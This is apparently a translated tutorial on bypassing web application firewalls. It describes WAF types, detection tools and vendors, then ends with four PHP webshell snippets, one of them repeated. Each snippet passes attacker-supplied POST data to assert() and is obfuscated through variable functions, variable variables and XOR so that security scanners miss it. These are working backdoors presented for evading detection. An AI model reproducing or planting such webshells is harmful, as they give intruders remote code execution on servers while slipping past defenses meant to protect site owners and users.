WAF Bypass-Access Control-Backdoor Anti-kill

WAF bypassing mainly focuses on four stages: information collection, vulnerability discovery, vulnerability utilization, and authority control.

1. What is WAF?

Web Application Firewall (web application firewall), a well-recognized statement is “a product that web application firewall provides protection for web applications by implementing a series of security policies for HTTP/HTTPS.

Basically can be divided into the following four types:

Software WAF

Installed on the server in the form of software, you can access the files on the server, so you can detect whether there is a webshell on the server, whether there are files created, etc.

Hardware WAF

It is deployed in the link in the form of hardware and supports multiple deployment methods. When connected in series to the link, malicious traffic can be intercepted. In bypass monitoring mode, only attacks are recorded but not intercepted.

Cloud WAF

Generally, it works in the form of a reverse proxy. After configuration, the request data for the website will first pass through the WAF host, and the WAF host will filter the data before passing it to the server.

Web site built-in WAF

It comes from the internal filtering of the website, which appears directly in the website code, such as mandatory class conversion of input parameters, sensitive word detection of input parameters and so on.

2. How to judge WAF?

Wafw00f identification tool: https://github.com/EnableSecurity/wafw00f

Image recognition: https://mp.weixin.qq.com/s/3uUZKryCufQ_HcuMc8ZgQQ

Other project scripting platforms.

3What are the current common WAF products?

Reference: https://blog.csdn.net/w2sft/article/details/104533082/

① Hardware type

Hardware-based WAF exists in the form of an independent hardware device, and supports deployment to the network in multiple ways (such as transparent bridge mode, bypass mode, reverse proxy, etc.) to provide security protection for back-end Web applications. It is the most traditional The type of WAF deployed in the surveyed enterprises accounted for 35.2%. Compared with the WAF of the software product category, the advantages of this type of product are good performance, comprehensive functions, and support for multi-mode deployment, etc., but its price is usually more expensive. The WAFs of domestic veteran manufacturers such as NSFOCUS, Anheng, and Venustech all fall into this category.

② Software type

This type of WAF is realized by pure software, which is characterized by simple installation, easy use, and low cost. But its shortcomings are also obvious. In addition to the limited performance, there may also be compatibility, security and other issues. Representatives of this type of WAF include ModSecurity, Naxsi, ShareWAF, SafeDog, etc.

③ Cloud WAF

With the rapid development of cloud computing technology, it is possible to implement cloud-based WAF. In this survey, the proportion even surpassed that of traditional hardware WAF and jumped to the first place, reaching 39.4%. Alibaba Cloud, Tencent Cloud, Sangfor Cloud WAF, and Imperva WAF are typical representatives of this type of WAF.

4. Demonstration: Code-Script Backdoor Anti-kill Variation-Passing Parameters & amp;< /strong>Override & amp;Encrypted mutation & amp;XOR

<?php
$a=$_GET['a'];
$aa=$a.'ert';
$aa(base64_decode($_POST['x']));
?>

<?php
$a='b';
$b='assert';
$$a(base64_decode($_POST['x']));
?>

<?php
$a=('!'^'@').'ssert';
$a($_POST[x]);
?>

<?php
$a=$_GET['a'];
$aa=$a.'ert';
$aa(base64_decode($_POST['x']));
?>